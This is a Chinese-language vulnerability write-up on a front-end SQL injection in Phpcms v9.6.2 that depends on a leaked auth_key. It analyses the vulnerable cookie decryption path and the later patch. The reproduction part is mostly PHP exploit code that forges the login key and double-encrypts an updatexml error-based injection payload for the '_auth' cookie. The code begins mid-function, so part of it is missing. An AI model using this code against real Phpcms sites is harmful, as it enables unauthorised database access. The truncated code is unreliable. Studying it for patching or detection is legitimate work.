Phpcms_v9.6.2_前台sql注入

# Phpcms v9.6.2 前台sql注入

=========================

一、漏洞简介
————

二、漏洞影响
————

Phpcms v9.6.2

三、复现过程
————

### 漏洞分析

这个版本的的注入,是建立在任意文件读取漏洞存在的情况下才可利用。通过任意文件读取漏洞获得加解密的
**key** 值,我们可以用这个 **key** 加密我们的 **SQL注入payload**
。由于程序对解密后的数据并未过滤,最终导致漏洞发生。严格上来讲
**v9.6.2** 版本的注入只能在 **windows**
上利用,具体原因在上面的任意文件读取漏洞分析时也说了。下面我们来具体分析一下这个漏洞。

漏洞文件位于 **phpcms/modules/member/classes/foreground.class.php**
,代码如下图。我们可以明显看到下图第33行,程序直接将解密后的数据未经过滤直接带入查询。而待解密数据
**\$phpcms\_auth** 和解密秘钥 **\$auth\_key** 均可构造。

![](/static/qingy/Phpcms_v9.6.2_前台sql注入/img/rId25.png)

我们先来看一下待解密数据 **\$phpcms\_auth**
如何构造。从下图中,可以看出程序将从 **cookie** 中的 **xxx\_auth**
字段经过 **sys\_auth** 函数解密后,返回给了 **\$phpcms\_auth**
,而默认情况下使用 **pc\_base::load\_config(\’system\’, \’auth\_key\’)**
作为加解密的 **key** 值。

![](/static/qingy/Phpcms_v9.6.2_前台sql注入/img/rId26.png)

而 **pc\_base::load\_config(\’system\’, \’auth\_key\’)**
的值在网站搭建好后,会存储在 **caches/configs/system.php**
中,我们可以通过任意文件读取来获得这个值。

![](/static/qingy/Phpcms_v9.6.2_前台sql注入/img/rId27.png)

现在 **\$phpcms\_auth** 已经搞定了,我们再来看看 **\$auth\_key =
get\_auth\_key(\’login\’)** 如何构造,跟进 **get\_auth\_key**
的代码。我们可以看到 **\$auth\_key** 由
**\$prefix、pc\_base::load\_config(\’system\’,\’auth\_key\’)、ip()**
三个元素决定。前两个都是已知的,而第三个获取用户IP的函数存在IP伪造的问题,也可以是固定的。

![](/static/qingy/Phpcms_v9.6.2_前台sql注入/img/rId28.png)

所以 **get\_auth\_key(\’login\’)**
的值也是我们可以构造的,剩下的事情只要我们将 **payload**
传给加密函数加密两次即可。我们最后再来看一下 **PHPCMS v9.6.3**
中是如何修复这个漏洞的,补丁如下:

![](/static/qingy/Phpcms_v9.6.2_前台sql注入/img/rId29.png)

可以明显看到,补丁将解密后获得的 **\$userid** 进行了强转。

### 漏洞复现

分析完毕后得到大致流程:

解密操作:get\_cookie(‘auth’)
得到\$phpcms\_auth,get\_auth\_key(‘login’)得到\$auth\_key,然后sys\_auth(\$phpcms\_auth,
‘DECODE’, \$auth\_key)。

再通俗些的话:sys\_auth方法对cookie中包含auth的参数名对应的密文值,先使用配置文件中的auth\_key进行sys\_auth得到的值作为第一次解密后的值,然后使用配置文件中的auth\_key的值与客户端请求的IP拼接做MD5加密的值做为新的key,第一次解密后的值与新的key最后传入sys\_auth进行解密得到最终的明文。

反之加密方法便是:

使用配置文件中的auth\_key的值与客户端请求的IP拼接做MD5加密的值做为新的key,使用新的key与明文进行sys\_auth得到的值作为第一次加密的密文,然后使用配置文件中的auth\_key作为key与第一次加密的密文传入sys\_auth得到的值作为最终的密文,也就是cookie字段名称中包含auth的参数对应的值。

**如下是将各个文件中的加密解密方法抓取出来稍作修改,在本地进行payload的加解密操作:**

0) && substr($result, 10, 16) == substr(md5(substr($result, 26).$keyb), 0, 16)) {
return substr($result, 26);
} else {

return ”;
}
} else {
return $keyc.rtrim(strtr(base64_encode($result), ‘+/’, ‘-_’), ‘=’);
}
}

function get_auth_key($prefix,$suffix=””,$ip=’127.0.0.1′,$auth_key=’7G6idVtMAxhgFVu5vGp1′) {
if($prefix==’login’){
$pc_auth_key = md5($auth_key.$ip);
}else if($prefix==’email’){
$pc_auth_key = md5($auth_key);
}else{
$pc_auth_key = md5($auth_key.$suffix);
}
$authkey = md5($prefix.$pc_auth_key);
return $authkey;
}

//解密过程
//step 1
$encryption_str = ‘6fc7TB1Y1nIRK5HunMc5HAUw5WkBLLuQGBiOISDhJM4d8N8WHHOvqMaUSyWrZdVdH046oGv_e_Ir6Q157UV-yT5Aksuc_h_4RfwZqsEwDHfQckv4SReOiYFxm083X7Tydcw-nUy8l3nP-ouUGl59sN4’;
$operation1 = ‘DECODE’;
$decryption_step1 = (sys_auth($encryption_str, $operation1));
echo ‘decryption_step1 result:’.$decryption_step1.”\n”;

//step 2
$decryption_step2 = $decryption_step1;
$auth_key = get_auth_key(‘login’);
echo ‘decryption_step2 result:’.sys_auth($decryption_step2, ‘DECODE’, $auth_key).”\n”;

echo ‘———————–‘.”\n” ;

//加密过程
//step 1
$clear_str = “1’or updatexml(1,concat(0x7e,(select user()),0x7e),1) or ‘1 f867fef04bd76d95abe01300951ca336″;
$operation2 = ‘ENCODE’;
$encryption_step1 = sys_auth($clear_str, ‘ENCODE’, $auth_key);
echo ‘encryption_step1 result:’.$encryption_step1.”\n”;

//step 2
$encryption_step2 = (sys_auth($encryption_step1, $operation2));
echo ‘encryption_step2 result:’.$encryption_step2;

使用上面的代码可以进行解密和加密,下图中decryption\_step2
result的值便是对payload进行解密的最终结果,encryption\_step2的值是对payload进行加密的最终结果。

![](/static/qingy/Phpcms_v9.6.2_前台sql注入/img/rId31.png)

最终利用的现象,cookie中的YDVIB\_auth参数名称,前缀是安装时候生成的可能不一样,可以在配置文件中找到对应的值,可以先注册普通用户然后看服务端下发的cookie中字段名称中xxx\_auth的参数名称,便是存在漏洞的位置。

![](/static/qingy/Phpcms_v9.6.2_前台sql注入/img/rId32.png)

参考链接
——–

>
>
>

© 版权声明
THE END
喜欢就支持一下吧
点赞0 分享
评论 抢沙发

请登录后发表评论

    请登录后查看评论内容